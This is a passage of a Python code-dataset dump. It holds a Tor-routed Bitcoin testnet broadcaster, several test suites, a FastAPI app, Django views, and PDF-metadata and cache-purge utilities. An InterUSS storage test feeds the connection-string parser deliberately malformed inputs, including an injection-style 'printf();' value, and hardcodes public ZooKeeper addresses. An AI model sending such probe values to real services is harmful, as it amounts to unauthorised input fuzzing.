Entered: \" + str(len(tx_list)))\n else:\n tx_list.append(tx_next)\n secrets.SystemRandom().shuffle(tx_list)\n\n # Create ordered random times at which to broadcast:\n start = datetime.now()\n min_delay = timedelta(minutes=2)\n min_time = start + min_delay\n\n user_input_minutes = int(input('Minutes: '))\n user_input_hours = int(input('Hours: '))\n user_input_days = int(input('Days: '))\n\n max_delay = timedelta(minutes=user_input_minutes, hours=user_input_hours, days=user_input_days)\n max_time = min_time + max_delay\n\n number_of_times = len(tx_list)\n max_duration = max_time - min_time\n\n for i in range(0, number_of_times):\n random_time = secrets.SystemRandom().uniform(0, 1) * max_duration\n time_list.append(min_time + random_time)\n\n time_list.sort()\n\n # Print list of transactions & target broadcast times\n for i in range(0, len(tx_list)):\n print(\"Time: \" + str(time_list[i]) + \" | tx: \" + str(tx_list[i]))\n\n return\n\n\ndef push_tx(payload):\n requests.post('http://explorerzydxu5ecjrkwceayqybizmpjjznk5izmitf2modhcusuqlid.onion/testnet/api/tx', data=payload) # or use 'https://blockstream.info/testnet/api/tx'\n print(\"############################# SENDING TRANSACTION #############################\")\n print(\"Data Sent: \" + str(payload))\n print(\"IP Address Used: \" + str(get_current_ip()))\n\n\ndef process_tx(i):\n global next_broadcast_time\n\n renew_tor_ip() # Renew tor IP address\n\n # Set broadcast values\n next_broadcast_tx = tx_list[i]\n next_broadcast_time = time_list[i]\n\n current_time = datetime.now()\n\n if current_time > next_broadcast_time:\n time_remaining = next_broadcast_time - next_broadcast_time\n else:\n time_remaining = next_broadcast_time - current_time\n\n time.sleep(time_remaining.total_seconds())\n push_tx(next_broadcast_tx)\n push_time = datetime.now()\n\n return push_time\n\n\ndef process_all():\n for i in range(0, len(tx_list)):\n print(\"\")\n print(\"Transaction \" + str(i+1) + \" broadcast at \" + str(process_tx(i)))\n print(str(len(tx_list)-i-1) + \" Transactions Remaining\")\n\n\ndef main():\n build_lists()\n process_all()\n print(\"\")\n print(\"############################# TXCAST COMPLETE #############################\")\n\nmain()\n","sub_path":"Python/txCast.py","file_name":"txCast.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"361050296","text":"test_limit = 400\nlower_bound = 150\n\nlimit = 80000\ntriangle_array = []\npent_array = []\nhex_array = []\n\ndef is_triangle(n):\n for x in range(lower_bound,test_limit):\n triangle_array.append((x/2)*(x+1))\n return n in triangle_array\n\ndef is_pent(n):\n for y in range(lower_bound,test_limit):\n pent_array.append((y/2)*((3*y)-1))\n return n in pent_array\n\ndef is_hex(n):\n for z in range(lower_bound,test_limit):\n hex_array.append(z*((2*z)-1))\n return n in hex_array\n\nfor x in range (40000, limit):\n if is_pent(x) and is_hex(x):\n print(x)","sub_path":"Euler_45.py","file_name":"Euler_45.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"338799186","text":"'''\nCopyright (C) 2017 Black Duck Software, Inc.\nhttp://www.blackducksoftware.com/\n\n\nLicensed to the Apache Software Foundation (ASF) under one\nor more contributor license agreements. See the NOTICE file\ndistributed with this work for additional information\nregarding copyright ownership. The ASF licenses this file\nto you under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied. See the License for the\nspecific language governing permissions and limitations\nunder the License.\n'''\nimport sys\nsys.path.append('../src/lib')\nimport blackduck_software as bds\n\nfrom proboscis.asserts import assert_equal\nfrom proboscis import test\n\n@test\nclass TestTransformApiEndpoint(object):\n \"\"\"Confirm that blackduck_software.transformApiEndpoint works correctly.\"\"\"\n \n global expected\n expected = 'test.endpoint.com'\n \n @test\n def testWithPrefixHttp(self):\n prefix = 'http://'\n actual = bds.transform_api_endpoint(str(prefix + expected))\n assert_equal(actual, expected, 'Transform incorrect when prefix is \"' + prefix + '\"')\n \n @test \n def testWithPrefixHttps(self):\n prefix = 'https://'\n actual = bds.transform_api_endpoint(str(prefix + expected))\n assert_equal(actual, expected, 'Transform incorrect when prefix is \"' + prefix + '\"')\n \n @test \n def testWithNoPrefix(self):\n actual = bds.transform_api_endpoint(expected)\n assert_equal(actual, expected, 'Transform incorrect when no prefix')","sub_path":"black-duck-decorator/test/lib/blackduck_software_test.py","file_name":"blackduck_software_test.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"231017774","text":"#playing with turtle graphics\n\nimport turtle\n\n#create window\nloadwindow = turtle.Screen()\nturtle.colormode(255)\n\n#turn off draw mode\nturtle.speed(0)\n\nsides = 6\n\n#create and run turle\ndef shape(size, sides):\n for i in range(sides):\n turtle.forward(size)\n turtle.left(360/sides)\n\nfor i in range(100):\n shape(i, i)\n turtle.left(i)\n\n\n \n# wait for user to end \n","sub_path":"Sanaz/Turtle/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"627454890","text":"\"\"\"Test of theInterUSS Platform Data Node storage API server.\n\n\nCopyright 2018 Google LLC\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n https://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport threading\nimport unittest\nfrom dateutil import parser\nfrom kazoo.handlers.threading import KazooTimeoutError\n\nimport storage_interface\nZK_TEST_CONNECTION_STRING = '35.224.64.48:2181,35.188.14.39:2181,35.224.180.72:2181'\nPARALLEL_WORKERS = 10\n\n\nclass InterUSSStorageInterfaceTestCase(unittest.TestCase):\n\n def setUp(self):\n # IMPORTANT: Puts us in a test data location\n self.mm = storage_interface.USSMetadataManager(\n ZK_TEST_CONNECTION_STRING, testgroupid='InterUSSStorageInterfaceTest')\n\n def tearDown(self):\n # IMPORTANT: Clean out your test data when you are done\n self.mm.delete_testdata()\n self.mm = None\n\n def testBadConnectionStrings(self):\n with self.assertRaises(ValueError):\n storage_interface.USSMetadataManager(\n 'terrible:connection:1459231232133_string-#$%@',\n testgroupid='InterUSSStorageInterfaceTest')\n with self.assertRaises(ValueError):\n storage_interface.USSMetadataManager(\n '__init__%password%', testgroupid='InterUSSStorageInterfaceTest')\n with self.assertRaises(ValueError):\n storage_interface.USSMetadataManager(\n '\\'printf();\\'', testgroupid='InterUSSStorageInterfaceTest')\n with self.assertRaises(KazooTimeoutError):\n storage_interface.USSMetadataManager(\n '123456789101112', testgroupid='InterUSSStorageInterfaceTest')\n with self.assertRaises(KazooTimeoutError):\n storage_interface.USSMetadataManager(\n 'google.com:2424,gmail.com:14566',\n testgroupid='InterUSSStorageInterfaceTest')\n\n def testGetCellNegativeCases(self):\n assert self.mm.get(2, 1, 2**2)['status'] == 'fail'\n # x, y, z are ints\n assert self.mm.get(1, '1a', 1)['status'] == 'fail'\n assert self.mm.get(1, 1, 'aa')['status'] == 'fail'\n assert self.mm.get(None, 1, 1)['status'] == 'fail'\n # x and y tiles max are 2^zoom - 1\n assert self.mm.get(1, 2, 1)['status'] == 'fail'\n assert self.mm.get(2, 5478118, 1)['status'] == 'fail'\n assert self.mm.get(2, 2**2, 1)['status'] == 'fail'\n assert self.mm.get(12, 2**12, 1)['status'] == 'fail'\n assert self.mm.get(1, 17, 1)['status'] == 'fail'\n assert self.mm.get(1, 1, 11)['status'] == 'fail'\n assert self.mm.get(9, 2**8, 2**11)['status'] == 'fail'\n\n def testGetCellPositiveEmptyCases(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # simple 1,1,1\n r = self.mm.get(1, 1, 1)\n assert r['status'] == 'success'\n assert r['data']['version'] == 0\n # zero case\n r = self.mm.get(0, 0, 0)\n assert r['status'] == 'success'\n assert r['data']['version'] == 0\n r = self.mm.get(11, 0, 5)\n assert r['status'] == 'success'\n assert r['data']['version'] == 0\n # limit in the y direction\n r = self.mm.get(10, 1, 2**10 - 1)\n assert r['status'] == 'success'\n assert r['data']['version'] == 0\n # limit in the x direction\n r = self.mm.get(18, 2**18 - 1, 2**10 - 1)\n assert r['status'] == 'success'\n assert r['data']['version'] == 0\n # Make sure everything is clean\n self.mm.delete_testdata()\n\n def testPositiveGetSetDeleteCycle(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # 2,1,1 get empty\n g = self.mm.get(2, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 0\n assert not g['data']['operators']\n # simple set with basic values\n s = self.mm.set(2, 1, 1, g['sync_token'], 'uss', 'uss-scope', 'GUTMA',\n 'https://g.co/flight', '2018-01-01T00:00:00+00:00',\n '2018-01-01T01:00:00+00:00')\n assert s['status'] == 'success'\n assert s['data']['version'] == 1\n assert len(s['data']['operators']) == 1\n o = s['data']['operators'][0]\n assert o['uss'] == 'uss'\n assert o['operation_endpoint'] == 'https://g.co/flight'\n assert o['operation_format'] == 'GUTMA'\n assert o['version'] == 1\n assert o['minimum_operation_timestamp'] == '2018-01-01T00:00:00+00:00'\n assert o['maximum_operation_timestamp'] == '2018-01-01T01:00:00+00:00'\n # simple delete\n d = self.mm.delete(2, 1, 1, 'uss')\n assert d['status'] == 'success'\n assert d['data']['version'] == 2\n assert not d['data']['operators']\n # simple confirm get is empty\n g = self.mm.get(2, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 2\n assert not g['data']['operators']\n # Make sure everything is clean\n self.mm.delete_testdata()\n\n def testSetCellWithOutdatedsync_token(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # 3,1,1 get empty\n g = self.mm.get(3, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 0\n assert not g['data']['operators']\n # simple set with basic values\n s = self.mm.set(3, 1, 1, g['sync_token'], 'uss1', 'uss1-scope', 'GUTMA',\n 'https://g.co/flight', '2018-01-01T00:00:00+00:00',\n '2018-01-01T01:00:00+00:00')\n assert s['status'] == 'success'\n assert s['data']['version'] == 1\n assert len(s['data']['operators']) == 1\n # now try to do a set with the original sync token\n s = self.mm.set(3, 1, 1, g['sync_token'], 'uss2', 'uss2-scope', 'GUTMA',\n 'https://h.com/f/3/1/1', '2018-01-01T11:00:00+00:00',\n '2018-01-01T12:00:00+00:00')\n assert s['status'] == 'fail'\n # confirm version is still the first write\n g = self.mm.get(3, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 1\n assert len(g['data']['operators']) == 1\n # Make sure everything is clean\n self.mm.delete_testdata()\n\n def testSetCellsInParallelWithSamesync_token(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # 4,1,1 get empty\n g = self.mm.get(4, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 0\n assert not g['data']['operators']\n threads = []\n for i in range(PARALLEL_WORKERS):\n t = threading.Thread(\n target=self.SetCellWorker, args=(\n i,\n g['sync_token'],\n ))\n threads.append(t)\n t.start()\n t.join()\n # confirm there is only one update\n g = self.mm.get(4, 1, 1)\n assert g['status'] == 'success'\n assert g['data']['version'] == 1\n assert len(g['data']['operators']) == 1\n # Make sure everything is clean\n self.mm.delete_testdata()\n\n def SetCellWorker(self, num, sync_token):\n self.mm.set(4, 1, 1, sync_token, 'uss' + str(num), 'uss-scope' + str(num),\n 'GUTMA', 'https://' + str(num) + '.io/flight',\n '2018-01-01T00:00:00+00:00', '2018-01-01T01:00:00+00:00')\n return\n\n def testSetCellsWithInvalidTimestamps(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # 5,1,1 get empty\n s = self.mm.get(5, 1, 1)\n token = s['sync_token']\n testsets = [('Not a valid timestamp', '215664892128621657566'),\n ('2018-01-01H00:00:00+00:00', '2019-01-01!00:00:00'),\n ('2018-01-01T00:00:00+00:00', '215664892128621657566')]\n for test in testsets:\n s = self.mm.set(5, 1, 1, token, 'uss', 'uss-scope', 'GUTMA',\n 'https://g.co/flight', test[0], test[1])\n assert s['status'] == 'fail'\n # Make sure everything is clean\n self.mm.delete_testdata()\n return\n\n def testSetCellsWithValidTimestamps(self):\n # Make sure everything is clean\n self.mm.delete_testdata()\n # 5,1,1 get empty\n s = self.mm.get(5, 1, 1)\n token = s['sync_token']\n testsets = [('2018-01-01T00:00+00', '2019-01-01T01:02:03.12345+00:00'),\n ('2018-01-01T00:00:00', '2019-01-01T01:02:03.12345'),\n ('2018-02-28T23:59:59-07:00', '2018-03-02T23:59:59+08:00'),\n ('2018-01-01T00:00:00', '2019-01-01')\n ]\n for test in testsets:\n s = self.mm.set(5, 1, 1, token, 'uss', 'uss-scope', 'GUTMA',\n 'https://g.co/flight', test[0], test[1])\n token = s['sync_token']\n assert s['status'] == 'success'\n o = s['data']['operators'][0]\n assert parser.parse(test[0]) == parser.parse(\n o['minimum_operation_timestamp'])\n assert parser.parse(test[1]) == parser.parse(\n o['maximum_operation_timestamp'])\n # Make sure everything is clean\n self.mm.delete_testdata()\n return\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"datanode/src/storage_interface_test.py","file_name":"storage_interface_test.py","file_ext":"py","file_size_in_byte":9012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"418170583","text":"from random import SystemRandom\n\nimport pytest\n\nfrom cacheout import LFUCache\n\n\nparametrize = pytest.mark.parametrize\nrandom = SystemRandom()\n\n\n@pytest.fixture\ndef cache():\n _cache = LFUCache(maxsize=5)\n return _cache\n\n\ndef assert_keys_evicted_in_order(cache, keys):\n \"\"\"Assert that cache keys are evicted in the same order as `keys`.\"\"\"\n keys = keys.copy()\n for n in range(cache.maxsize, cache.maxsize * 2):\n cache.set(n, n)\n assert cache.full()\n assert keys.pop(0) not in cache\n\n for key in keys:\n assert key in cache\n\n\ndef test_lfu_eviction(cache):\n \"\"\"Test that LFUCache evicts least frequently used set entries first.\"\"\"\n key_counts = [(\"a\", 4), (\"b\", 3), (\"c\", 5), (\"d\", 1), (\"e\", 2)]\n\n for key, count in key_counts:\n cache.set(key, key)\n\n for _ in range(count):\n cache.get(key)\n\n sorted_key_counts = sorted(key_counts, key=lambda kc: kc[1])\n eviction_order = [kc[0] for kc in sorted_key_counts]\n max_access_count = max([kc[1] for kc in sorted_key_counts])\n\n for n in range(len(key_counts)):\n cache.set(n, n)\n\n for _ in range(max_access_count + 1):\n cache.get(n)\n\n assert cache.full()\n assert eviction_order[n] not in cache\n\n for key in eviction_order[(n + 1) :]:\n assert key in cache\n\n\ndef test_lfu_get(cache):\n \"\"\"Test that LFUCache.get() returns cached value.\"\"\"\n for key, value in cache.items():\n assert cache.get(key) == value\n\n\ndef test_lfu_clear(cache):\n \"\"\"Test that LFUCache.clear() resets access counts.\"\"\"\n cache.maxsize = 2\n\n cache.set(1, 1)\n cache.set(2, 2)\n\n for _ in range(5):\n cache.get(1)\n\n cache.set(3, 3)\n\n assert 2 not in cache\n\n cache.clear()\n assert len(cache) == 0\n\n cache.set(1, 1)\n cache.set(2, 2)\n\n cache.get(2)\n cache.set(3, 3)\n\n assert 1 not in cache\n","sub_path":"tests/test_lfu.py","file_name":"test_lfu.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"408838667","text":"from fastapi import FastAPI\nfrom starlette.middleware.cors import CORSMiddleware\nfrom .config import settings\nfrom .api.api_v1.api import api_router\n\n\napp = FastAPI(\n title='BasicAPI',\n description='This is just a starter project',\n version='1.0.0',\n docs_url='/docs',\n redoc_url='/'\n)\n\nif settings.BACKEND_CORS_ORIGINS:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\n\napp.include_router(api_router, prefix=settings.API_V1_STR)\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"398313529","text":"from django.shortcuts import render\nfrom . import models\n# Create your views here.\n\n\ndef index(request):\n\tcandidate = models.Resume.objects.get(id__exact = 1)\n\tqualifications = models.Qualification.objects.all().filter(candidate__id__exact = 1)\n\tprojects = models.Project.objects.all().filter(candidate__id__exact = 1)\n\tprojects_list=[]\n\tfor pro in projects:\n\t\tprojects_dict={}\n\t\tprojects_dict['name']=pro.name\n\t\tprojects_dict['link']=pro.link\n\t\tprojects_dict['description']=pro.description\n\t\tprojects_dict['image']=pro.image.url\n\t\tprojects_list.append(projects_dict)\n\n\n\texpertise = models.Expertise.objects.all().filter(candidate__id__exact = 1)\n\n\treturn render(request, 'index.html', {\t'candidate':candidate, \n\t\t\t\t\t\t\t\t\t\t\t'qualifications':qualifications, \n\t\t\t\t\t\t\t\t\t\t\t'expertise':expertise, \n\t\t\t\t\t\t\t\t\t\t\t'projects':projects, \n\t\t\t\t\t\t\t\t\t\t\t'projects_count':range((projects.count()//3)),\n\t\t\t\t\t\t\t\t\t\t\t'projects_residue':range((projects.count()%3)),\n\t\t\t\t\t\t\t\t\t\t\t'projects_list':projects_list, \n\t\t\t\t\t\t\t\t\t\t\t'three':range(3), \n\t\t\t\t\t\t\t\t\t\t})\n\n","sub_path":"credentials/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"62634351","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 17 10:47:06 2020\n\n@author: singvibu\n\"\"\"\nimport pandas as pd\nimport nltk\n\nfrom IPython.core.interactiveshell import InteractiveShell\nInteractiveShell.ast_node_interactivity = \"all\"\n# Importing libraries \nimport nltk \nimport re \nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer \nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \nimport pandas as pd \n\nfrom pathlib import Path\n\n\nimport PyPDF2\nfrom pathlib import Path\n\n\n \ndef check_topic_present(topic, text):\n \"\"\"\n This basic function attempts to check if any of the keywords of a \n particular topic are present in the the description line of the PDF File. \n \n Parameters\n ----------\n topic: contains a list of keywords present in a topic\n text: contains the textual description line for the PDF\n \n Returns\n ----------\n Binary_Value:\n It returs binary value 1 or 0, depecding on if there is a keyword that \n is present in the textual description line for the PDF. \n \n \"\"\"\n \n for key in topic:\n if key in text:\n return 1\n return 0\n \ndef remove_string_special_characters(s): \n \"\"\"\n This basic function attempts to replace special characters, and multiple \n white spaces with a single pscae. It also removes all leading and trailing \n characters from the string. Furthermore, it converts the string into lower \n case characters. thus making the input string into easy to process string.\n \n Parameters\n ----------\n s: the input string \n \n Returns\n ----------\n Easy to process string:\n It reurns easy to process string, which means the string does not have \n unnecessary white spaces and all characters are in lower case.\n \n \"\"\"\n \n # removes special characters with ' ' \n stripped = re.sub('[^a-zA-z\\s]', '', s) \n stripped = re.sub('_', '', stripped) \n \n # Change any white space to one space \n stripped = re.sub('\\s+', ' ', stripped) \n \n # Remove start and end white spaces \n stripped = stripped.strip() \n return stripped.lower() \n \ndef pdf_categorize(path, Index0):\n \"\"\"\n This method attempts to categorize all the PDF files from the list of PDFs \n into one more ESA categories. \n \n Based on the contents of a ESA files, we were able to identify the top 10 \n ESA categories. We performed frequency analysis of the keywords from the \n PDF contents, thereafter we came up with top 10 ESA categories. \n \n As there might be a single PDF File covering more than one ESA category, \n hence, we get an arror of categories for each PDF File. PDF files which do \n not match to any of these 10 categories are classifies as 'other'.\n \n Parameters\n ----------\n path: path of the root folder in string format\n This path will be used to find the folder location where the scraped \n pdf files are going to be saved\n Index0: Dataframe with the DataIDs of the PDF and their downloadable links \n Data_ID: It is the unique ID of the PDF file which will be used as the \n name of the PDF downloaded\n esa_download_link: URL addresses stored as a list of string\n a list of the pdf URLs so that the respepctive files could be \n downloaded\n \n Returns\n ----------\n Index1:\n This returns a dataframe similar to Index0 with an additional coloumn\n 'Topics', indicating the ESA categories which the code has identified \n for the PDF file.\n \n \"\"\"\n \n #Defining 10 categories based on the keywords chosen \n land1 = ['soil', 'land', 'ground', 'terrain', 'topography', 'ecozones', 'terrain']\n air2 = ['air', 'emission', 'ghg', 'gas', 'greenhouse', 'weather' , 'climate', 'meteorological', 'atmospher']\n water3 = ['water', 'fish', 'wetlands', 'navigation', 'marine', 'aqua', 'drain', 'river']\n wildlife4 = ['wild', 'fish', 'poisson', 'species', 'habitat', 'acoustic', 'life', 'biophysical']\n vegetation5 = ['vegetation', 'wetlands', 'plant', 'soil']\n human6 = ['human', 'socio', 'social', 'economic', 'economy' 'occupancy', 'heritage', 'health', 'aesthetics', \n 'employment', 'acoustic', 'traditional', 'navigation', 'resource', 'infrastructure', 'noise', 'rapport']\n alignment_sheet7 = ['alignment', 'sheet']\n tech8 = ['technical', 'tech']\n traditional_knowledge9 = ['first', 'nation', 'traditional', 'engage']\n epp10 = ['environment protection', 'environmental protection' , 'epp']\n \n topics = []\n for index, row in Index0.iterrows():\n # Extracting the PDF data and the PDF name\n # PDF name might have useful data about the contents of the PDF\n line = str(row['ESA Section(s)']) + str(row['File Name'])\n \n # unnecessary white spacxes is removed and text converted to lower case \n line = remove_string_special_characters(line).lower()\n line_topics = []\n topic_found = 0\n \n # Categorising the PDFs into 10 ESA categories based on keywords present \n if check_topic_present(land1, line) == 1:\n line_topics.append('Land')\n topic_found = 1\n \n if check_topic_present(air2, line) == 1:\n line_topics.append('Air')\n topic_found = 1\n \n if check_topic_present(water3, line) == 1:\n line_topics.append('Water')\n topic_found = 1\n \n if check_topic_present(wildlife4, line) == 1:\n line_topics.append('Wildlife')\n topic_found = 1\n \n if check_topic_present(vegetation5, line) == 1:\n line_topics.append('Vegetation')\n topic_found = 1\n \n if check_topic_present(human6, line) == 1:\n line_topics.append('Human')\n topic_found = 1\n \n if check_topic_present(alignment_sheet7, line) == 1:\n line_topics.append('Alignment Sheet')\n topic_found = 1\n \n if check_topic_present(tech8, line) == 1:\n line_topics.append('Technology')\n topic_found = 1\n\n if check_topic_present(traditional_knowledge9, line) == 1:\n line_topics.append('Traditional Knowledge')\n topic_found = 1\n \n if check_topic_present(epp10, line) == 1:\n line_topics.append('Environment Protection Plan')\n topic_found = 1\n \n if topic_found == 0:\n line_topics.append('Other')\n \n # the detected topics for each PDF is appended in the array \n topics.append(line_topics)\n \n # New Index1 has all the couloumns as Index0 and an addition coloumn\n Index1 = Index0\n Index1['Topics'] = topics\n return(Index1)\n\n\ndef pdf_size(path, Index0):\n \"\"\"\n This method attempts to identify the size of each of the PDF files (in \n bytes) from the list of files present in the Index0. The files which might \n have an error in opening or any other dependent step will show a file size \n of 0 bytes. \n \n Parameters\n ----------\n path: path of the root folder in string format\n This path will be used to find the folder location where the scraped \n pdf files are going to be saved\n Index0: Dataframe with the DataIDs of the PDF and their downloadable links \n Data_ID: It is the unique ID of the PDF file which will be used as the \n name of the PDF downloaded\n esa_download_link: URL addresses stored as a list of string\n a list of the pdf URLs so that the respepctive files could be \n downloaded\n \n Returns\n ----------\n Index1:\n This returns a dataframe similar to Index0 with an additional coloumn\n 'PDF Size (bytes)', indicating the size of the PDF file in bytes. \n \n \"\"\"\n sizes = []\n \n # iterate through each row of the Dataframe\n for index, row in Index0.iterrows():\n try:\n pdf_path = path + \"\\\\Data_Files\\\\PDFs\\\\\" + str(row['Data ID']) + '.pdf'\n file = Path(pdf_path)\n size = file.stat().st_size\n sizes.append(size)\n except:\n sizes.append(0)\n \n # New Index1 has all the couloumns as Index0 and an addition coloumn\n Index1 = Index0\n Index1['PDF Size (bytes)'] = sizes\n return(Index1)\n \n\ndef pdf_pagenumbers(path, Index0):\n \"\"\"\n This method attempts to identify the number of pages in each of the PDF \n files from the list of files present in the Index0. The files which might \n have an error in opening due to any other dependent step will have 0 number \n of pages in the pdf. \n \n Parameters\n ----------\n path: path of the root folder in string format\n This path will be used to find the folder location where the scraped \n pdf files are going to be saved\n Index0: Dataframe with the DataIDs of the PDF and their downloadable links \n Data_ID: It is the unique ID of the PDF file which will be used as the \n name of the PDF downloaded\n esa_download_link: URL addresses stored as a list of string\n a list of the pdf URLs so that the respepctive files could be \n downloaded\n \n Returns\n ----------\n Index1:\n This returns a dataframe similar to Index0 with an additional coloumn\n 'Number of Pages', indicating the number of pages in the PDF file. \n \n \"\"\"\n page_numbers = []\n \n # iterate through each row of the Dataframe\n for index, row in Index0.iterrows():\n try:\n pdf_path = Path(path + \"\\\\Data_Files\\\\PDFs\\\\\" + str(row['Data ID']) + '.pdf')\n with pdf_path.open(\"rb\") as pdf:\n reader = PyPDF2.PdfFileReader(pdf)\n if reader.isEncrypted:\n reader.decrypt(\"\")\n total_pages = reader.getNumPages()\n page_numbers.append(total_pages)\n except:\n page_numbers.append(0)\n \n # New Index1 has all the couloumns as Index0 and an addition coloumn\n Index1 = Index0\n Index1['Number of Pages'] = page_numbers\n return(Index1)\n \ndef get_outline_present(path, Index0):\n \"\"\"\n This method attempts to identify if the outline (Table of contents) is \n present in a PDF or not. The files which might have an error in opening due \n to any other dependent step will be marked as no outline present.\n \n Parameters\n ----------\n path: path of the root folder in string format\n This path will be used to find the folder location where the scraped \n pdf files are going to be saved\n Index0: Dataframe with the DataIDs of the PDF and their downloadable links \n Data_ID: It is the unique ID of the PDF file which will be used as the \n name of the PDF downloaded\n esa_download_link: URL addresses stored as a list of string\n a list of the pdf URLs so that the respepctive files could be \n downloaded\n \n Returns\n ----------\n Index1:\n This returns a dataframe similar to Index0 with an additional coloumn\n 'Outline Present'. This binary couloumn will indicate if the PDF file \n has an outline present or not. \n \n \"\"\"\n outline_present = []\n \n # iterate through each row of the Dataframe\n for index, row in Index0.iterrows():\n try:\n pdf_path = Path(path + \"\\\\Data_Files\\\\PDFs\\\\\" + str(row['Data ID']) + '.pdf')\n with pdf_path.open(\"rb\") as pdf:\n reader = PyPDF2.PdfFileReader(pdf)\n if reader.isEncrypted:\n reader.decrypt(\"\")\n s = reader.outlines\n len_s = len(s)\n \n # If length of outline extracted is >0, then outline is present \n if len_s > 0: \n outline_present.append(1)\n else:\n outline_present.append(0)\n except:\n outline_present.append(0)\n \n # New Index1 has all the couloumns as Index0 and an addition coloumn\n Index1 = Index0\n Index1['Outline Present'] = outline_present\n return(Index1)\n \n ","sub_path":"Codes/Section_01_Data_Extraction_Preparation/pdf_metadata.py","file_name":"pdf_metadata.py","file_ext":"py","file_size_in_byte":12260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"308042518","text":"from django.core.management import CommandError\n\nfrom peterbecom.base.basecommand import BaseCommand\nfrom peterbecom.base.fscache import (\n find_missing_compressions,\n invalidate_too_old,\n purge_outdated_cdn_urls,\n)\nfrom peterbecom.base.cdn import keycdn_zone_check\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\n \"--dry-run\",\n action=\"store_true\",\n default=False,\n help=\"Print instead of deleting\",\n )\n parser.add_argument(\n \"--skip-cdn-purge\",\n action=\"store_true\",\n default=False,\n help=\"Don't bother executing CDN purge commands\",\n )\n parser.add_argument(\n \"--revisit\",\n action=\"store_true\",\n default=False,\n help=\"Try to request the original URL again\",\n )\n parser.add_argument(\n \"--max-files\", default=100, help=\"Max number of URLs to purge (possibly)\"\n )\n\n def handle(self, **options):\n invalidate_too_old(\n verbose=options[\"verbosity\"] > 1,\n dry_run=options[\"dry_run\"],\n revisit=options[\"revisit\"],\n )\n\n find_missing_compressions(\n verbose=options[\"verbosity\"] > 1,\n max_files=int(options[\"max_files\"]),\n revisit=options[\"revisit\"],\n )\n\n if not options[\"skip_cdn_purge\"]:\n if not keycdn_zone_check():\n raise CommandError(\"KeyCDN Zone Check failed!\")\n purge_outdated_cdn_urls(\n verbose=options[\"verbosity\"] > 1,\n revisit=options[\"revisit\"],\n dry_run=options[\"dry_run\"],\n max_files=int(options[\"max_files\"]),\n )\n","sub_path":"peterbecom/base/management/commands/fscache.py","file_name":"fscache.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"150757706","text":"# -*- coding:utf-8 -*-\n\"\"\"Dj_pro URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom home import views as home_views\nfrom django.contrib.auth import views as auth_views\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^upload/', include('upload.urls')),\n url(r'^$', home_views.index, name=\"index\"),\n url(r'^accounts/login/$', auth_views.login), # If user is not login it will redirect to login pag\n url(r'^demo/', include('demo.urls')),\n url(r'^featureSelect/', include('feature_select.urls')),\n 